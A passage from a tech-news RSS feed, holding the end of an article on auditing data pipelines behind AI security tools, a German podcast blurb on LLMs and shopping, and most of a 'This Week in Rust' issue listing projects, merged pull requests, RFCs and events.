<p>The AI-powered security tools in your stack are capable of delivering real value against modern threats. But that capability is entirely contingent on the quality, consistency and freshness of the data flowing into them. Before your organization invests another dollar in model tuning or platform upgrades, ask a harder and more productive question: When did anyone last audit the pipelines those models actually depend on?</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ZDE Podcast 248: Wie Claude, Chatgpt und Gemini unser Einkaufsverhalten ändern – mit Dorit Posdorf]]></title>
<description><![CDATA[Large Language Models wie ChatGPT, Perplexity oder Gemini verändern bereits heute die Produktsuche und Kaufentscheidung von Kundinnen und Kunden. Was bedeutet das für Händler:innen, Marken, E-Commerce und Stationäre?
In dieser Folge spricht Marilyn mit der Digital- und E-Commerce-Expertin Dorit P...]]></description>
<link>https://tsecurity.de/de/3656308/it-nachrichten/zde-podcast-248-wie-claude-chatgpt-und-gemini-unser-einkaufsverhalten-aendern-mit-dorit-posdorf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656308/it-nachrichten/zde-podcast-248-wie-claude-chatgpt-und-gemini-unser-einkaufsverhalten-aendern-mit-dorit-posdorf/</guid>
<pubDate>Thu, 09 Jul 2026 10:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://zukunftdeseinkaufens.de/agentic-dorit/" title="ZDE Podcast 248: Wie Claude, Chatgpt und Gemini unser Einkaufsverhalten ändern – mit Dorit Posdorf" rel="nofollow"><img loading="lazy" width="732" height="274" src="https://zukunftdeseinkaufens.de/wp-content/uploads/2026/03/ZDE-Podcast-Folge-Header-732x274px.png" class="wp-image-37530 avia-img-lazy-loading-37530 webfeedsFeaturedVisual wp-post-image" alt="ZDE Podcast" link_thumbnail="1" decoding="async" srcset="https://zukunftdeseinkaufens.de/wp-content/uploads/2026/03/ZDE-Podcast-Folge-Header-732x274px.png 732w, https://zukunftdeseinkaufens.de/wp-content/uploads/2026/03/ZDE-Podcast-Folge-Header-732x274px-300x112.png 300w, https://zukunftdeseinkaufens.de/wp-content/uploads/2026/03/ZDE-Podcast-Folge-Header-732x274px-705x264.png 705w" sizes="(max-width: 732px) 100vw, 732px"></a>Large Language Models wie ChatGPT, Perplexity oder Gemini verändern bereits heute die Produktsuche und Kaufentscheidung von Kundinnen und Kunden. Was bedeutet das für Händler:innen, Marken, E-Commerce und Stationäre?
In dieser Folge spricht Marilyn mit der Digital- und E-Commerce-Expertin Dorit Posdorf über die Auswirkungen von Agentic Commerce und warum Unternehmen ihre Inhalte künftig nicht nur für Menschen, sondern auch für KI-Systeme optimieren müssen.<img src="https://zukunftdeseinkaufens.de/piwik/piwik.php?idsite=1&amp;rec=1&amp;url=https%3A%2F%2Fzukunftdeseinkaufens.de%2Fagentic-dorit%2F&amp;action_name=ZDE%20Podcast%20248%3A%20Wie%20Claude%2C%20Chatgpt%20und%20Gemini%20unser%20Einkaufsverhalten%20%C3%A4ndern%20%26%238211%3B%20mit%20Dorit%20Posdorf&amp;urlref=https%3A%2F%2Fzukunftdeseinkaufens.de%2Ffeed%2F" width="0" height="0" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 659]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:34 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/07/maintainer-spotlight-gen-li-rami3l/">Maintainer spotlight: Gen Li (@rami3l)</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/06/unite-for-clippy/">Together for a healthier Clippy</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-75">The Embedded Rustacean Issue #75</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://www.copper-robotics.com/whats-new/copper-rs-v100">copper-rs v1.0.0</a>: the open source deterministic robotics OS is now stable.</li>
<li><a href="https://rayfish.xyz/blog/01-introducing-rayfish">Rayfish: Your own private network. No servers, no setup.</a></li>
<li><a href="https://plabayo.tech/blog/rama-0-3">rama v0.3.0 — network service framework ready to be used by the wider Rust community</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.9.0">kache 0.9.0: supply-chain hardening + read-only CI cache</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/07/04/meet-guardiandbs-new-postgresql-compatibility-layer/">GuardianDB - PostgreSQL and P2P/Local-First Together</a></li>
<li><a href="https://buildnectar.com/">Nectar: a Rust-like language that compiles your whole web app to WebAssembly</a></li>
<li><a href="https://thekeeper.io/blog/logdrain-log-template-mining-in-rust/">logdrain: Fast, Embeddable Log-Template Mining in Rust</a></li>
<li><a href="https://medium.com/@vbasky/packaging-the-worlds-video-in-pure-rust-ff1f6b884fec">sheathe: Packaging the World's Video in Pure Rust</a></li>
<li><a href="https://docs.wickra.org/Quickstart-Rust">wickra: streaming-first technical indicators</a></li>
<li><a href="https://github.com/TeamXcelerator/xcelerator-solver/releases/tag/v0.1.0">Xcelerator Solver v0.1.0 -- deterministic symbolic regression</a></li>
<li><a href="https://github.com/tkmsikd/dlt-tui/releases/tag/v1.1.0">dlt-tui 1.1.0 - a fast TUI viewer for automotive DLT (AUTOSAR Diagnostic Log and Trace) files</a></li>
<li><a href="https://github.com/shihuili1218/rssh/releases/tag/v0.2.11">RSSH v0.2.11 — terminal workflows, safer SSH key import, and observable AI ops</a></li>
<li><a href="https://blog.none.at/blog/2026/2026-07-06-k8s-scale-app-rs/">k8s-scale-app-rs: Scale or Restart a Kubernetes Deployment from a CronJob</a></li>
<li><a href="https://dev.to/sicklefire/m-vis-v050-rc1-update-11cp">M-vis v0.5.0-rc1 update</a></li>
<li><a href="https://ganeshsivakumar.substack.com/p/flaredb">FlareDB: An Apache Beam Native Streaming Database built in Rust</a></li>
<li><a href="https://holovskyi.github.io/blog/typed-mqtt-topics-for-rust/">mqtt-typed-client 0.2: a type-safe async MQTT client on rumqttc</a></li>
<li><a href="https://github.com/LeChatP/RootAsRole/releases/tag/v4.0.0">RootAsRole: v4.0.0 Major release, secure execution, new logo</a></li>
<li><a href="https://www.qt.io/blog/rust-ui-framework-via-bridging-technology">A Cross-Platform Rust UI Framework via Qt’s Bridging Technology</a></li>
<li><a href="https://rapha.land/jam-programming-language/">Jam Programming Language</a></li>
<li><a href="https://www.clever.cloud/blog/company/2026/07/01/sozu-2-1-0-udp-load-balancer-programmable-edge/">Sōzu 2.1.0: UDP load balancing for the programmable edge</a></li>
<li><a href="https://op3kay.dev/writing/b0nker">b0nker: a minimal container runtime written in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=SGR5qBdwk30">Rust Berlin Meetup 25/06/2026 Livestream</a></li>
<li>[video] <a href="https://www.youtube.com/live/_LtgHxuysUo">How do you rewrite C/C++ projects to Rust? – JetBrains interview with Luca Palmieri, Mainmatter</a></li>
<li><a href="https://kerkour.com/rustcrypto-slow-simd-rust">Investigating why RustCrypto is slow: Deep dive into SIMD instructions and hardware acceleration</a></li>
<li><a href="https://parsa.wtf/cast/">bool as u32</a></li>
<li><a href="https://arxiv.org/html/2605.30106">A Rust-to-Lean Verification Pipeline with AI Provers: An Experience Report</a></li>
<li><a href="https://blog.dureuill.net/articles/wip/">Work In Progress Rust</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=Fk165jYfHpc">OpenAI just spent $600k on Rust</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e07-rising-academies/">Rising Academies with Dylan Brown - Rust in Production Podcast</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[series] <a href="https://aibodh.com/posts/bevy-tutorial-build-your-first-3d-editor-in-rust/">Bevy Tutorial: Build Your First 3D Editor - Create a 3D Space on an Infinite Grid</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-axum-basics-and-routing-by-building-a-url-shortener/">Learn Axum Basics and Routing by Building a URL Shortener</a></li>
<li>[series] <a href="https://plabayo.tech/blog/rama-101-1-https-clients-and-abstractions">Rama 101.1: HTTPS clients and layers of abstraction</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://seanborg.tech/tiny-blog/rust-week-ven-diagram/">Clickable euler diagram of all the Rust week talks</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/apis-saltans-core">apis-saltans</a>, a Zigbee implementation including a coordinator API.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1627">Richard Neumann</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>

<p>* <a href="https://github.com/name970/Protocol/issues/4">Protocol - Extend bit-exactness tests to f64 reconstruction targets</a>                                                                          <br>
* <a href="https://github.com/lenra-io/dofigen/issues/278">Dofigen - No image tag replacement flag for the generate command</a></p>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>598 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-30..2026-07-07">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156379">lint on <code>core::ffi::c_void</code> as a return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158577">polish some macro parsing code</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158604">resolve: no allocation in <code>resolve_ident_in(_local)_module_*</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158627">simplify option-iterator flattening in the compiler</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158537">add <code>std::io::cursor::WriteThroughCursor</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157347">implement <code>Box::as_non_null()</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156737">implement <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158427">implement <code>ptr::{read,write}_unaligned</code> via <code>repr(packed)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158539">move <code>SizeHint</code> and <code>IoHandle</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158540">move <code>std::io::Seek</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158704">optimize <code>ArrayChunks::try_rfold</code> with <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158573">stabilize <code>feature(atomic_from_mut)</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17135"><code>bindeps</code>: register transitive artifact targets</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17167">avoid cloning parsed TOML manifest in <code>ManifestErrorContext</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17176">avoid extra clone of parsed TOML manifest</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17178">remove unneeded cloning when parsing package index</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17169">change HashMaps and HashSets in Cargo to use Fxhasher</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17174">do not pass lint rustflags when <code>--cap-lints=allow</code> is set</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17164">fixed <code>Compilation::deps_output</code> only taking the last dep</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17177">pre-allocate a few vectors</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16807">stabilize <code>build-dir</code> layout v2</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17180">use a set when checking visited workspace members</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158751">fix crash when trying to inline foreign item which cannot have attributes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158334">show use-site paths for unevaluated const array lengths</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17319"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with const parameters</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17360"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with type params</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17309"><code>missing_trait_methods</code>: MSRV/unstable awareness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17289"><code>vec_init_then_push</code>: don't lint pushes from a macro expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17346"><code>inline_modules</code>: ignore <code>cfg(test)</code> modules in test builds</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17345"><code>match_same_arms</code>: keep arm-level expectations working under an outer allow</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17341"><code>unnecessary_operation</code>: avoid bad <code>!</code> suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17351"><code>unnecessary_unwrap_unchecked</code>: don't trigger inside the <code>_unchecked</code> fn</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17348">add required parentheses when the <code>needless_bool</code> suggestion is an operand</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17353">fix ICE when resolving local in <code>unnecessary_unwrap_unchecked</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17311">fix <code>infinite_loop</code> false positive inside gen blocks</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17358">fix <code>manual_c_str_literals</code> suggestion when the trailing backslash is escaped</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17337">fix <code>strlen_on_c_strings</code> incorrect suggestion logic</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17323">fix <code>suspicious_operation_groupings</code> duplications</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16902">lint bit width</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17338">optimize <code>Msrv::meets</code> calls</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17273">bail out of unicode lint scans when the snippet is pure ASCII</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17224">skip the HIR parent walk in <code>is_in_test_function</code> when there are no test items</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17366">place generated impl block after the existing impl block</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17333">refactor <code>StringAdd</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17334">refactor <code>suspicious_xor_used_as_pow</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17293">remove <code>lower_ty</code> in <code>uninhabited_reference</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17328">respect the configured MSRV in <code>manual_is_variant_and</code>'s <code>map() == Some(_)</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17332">rewrite <code>mut_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17329">rewrite <code>redundant_else</code> as a late pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17354">rewrite <code>tuple_array_conversions</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22595">SCIP: exclude leading/trailing trivia in definition ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22708">SCIP: remove dead <code>inlay_hints</code> field</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22433"><code>feat(ide-diagnostics)</code>: add diagnostics for invalid union patterns (E0784)</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22704"><code>internal(query-group-macro)</code>: remove the arity test</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22668">add tree top method to Syntax node</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22665">add handler for E0627</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22231">supports multi arms for <code>replace_match_with_if_let</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22690">fix UB in <code>smol_str borsh_non_utf8</code> test cases</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/20362">fix generic param for <code>generate_default_from_enum_variant</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22703"><code>walkthrough_create_project</code> file not packaged</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22677">assertion failure on closure with unbound function</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22613">avoid panic in <code>convert_tuple_struct_to_named_struct</code> on nested pattern usage</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22649">configuration syntax for nvim-lsp</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22706">correct resolution to value when it shares the same name with type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22619">exclude impls on the error type from impl enumeration</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22705">fix crash on <code>extract_variable</code> when selecting unresolved macro call</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22715">fix crash on completion inside macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22673">fix handling of params of coroutine fns</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22675">handle more cases of cfgs in expr store lowering</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22488">no generate with default assoc item</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22674">panics in <code>unwrap_return_type</code>, <code>remove_underscore</code>, and <code>promote_local_to_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22711">hoist attribute qualifier segment collection</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22709">reduce parser joint-token allocation</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22676">project-model: don't pass metadata extra args to sysroot</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22679">project-model: introduce cargo.configPath</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22581">provide startup time to ready log point and associated benchmark</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week was dominated by wild swings in benchmarks of the new-solver, which is not enabled by default, yet.
Apart from that, we got a very few notable changes, only one unexpected speedup from a bugfix in rustdoc.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;end=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;absolute=false&amp;stat=instructions%3Au">7dc2c162..3659db0d</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.2%</td>
<td>[0.2%, 0.2%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>162.1%</td>
<td>[0.2%, 1116.3%]</td>
<td>20</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.4%</td>
<td>[-8.4%, -0.1%]</td>
<td>7</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-1.1%</td>
<td>[-8.4%, -0.1%]</td>
<td>11</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-0.9%</td>
<td>[-8.4%, 0.2%]</td>
<td>10</td>
</tr>
</tbody>
</table>
<p>1 Regression, 1 Improvement, 4 Mixed; 3 of them in rollups
17 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/9f1bc6e374b5ae202366df1cbef850b79be8c641/triage/2026/2026-07-06.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158325">Document NonNull layout guarantees</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/112811">Tracking Issue for <code>slice_split_once</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2293">Empty repr(Rust) enums are ZSTs</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3982">Update RFC template</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3981">RFC: Store registry tokens in the OS credential store by default</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-08 - 2026-08-05 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-08 | Virtual (Cardiff, GB) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/">Rust and C++ Cardiff</a></li>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/315506435/"><strong>Operating Systems Book Club: Introduction + Processes</strong></a></li>
